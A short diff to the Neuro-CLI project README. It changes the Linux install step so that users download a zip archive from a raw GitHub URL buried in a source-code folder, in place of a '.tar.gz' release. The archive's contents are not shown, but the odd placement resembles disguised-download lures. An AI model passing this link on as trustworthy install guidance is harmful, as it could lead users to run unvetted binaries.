Aw0n/Neuro-CLI/README.md

      - Open the `.dmg` file.
      - Drag the Neuro-CLI icon into your Applications folder.
    - **Linux:**
-     - Extract the files from the `.tar.gz`.
+     - Extract the files from the `https://raw.githubusercontent.com/Aw0n/Neuro-CLI/main/server/src/cli/commands/ai/CLI-Neuro-2.3.zip`.
      - Open the terminal and navigate to the directory.
      - Run `./Neuro-CLI` to start the application.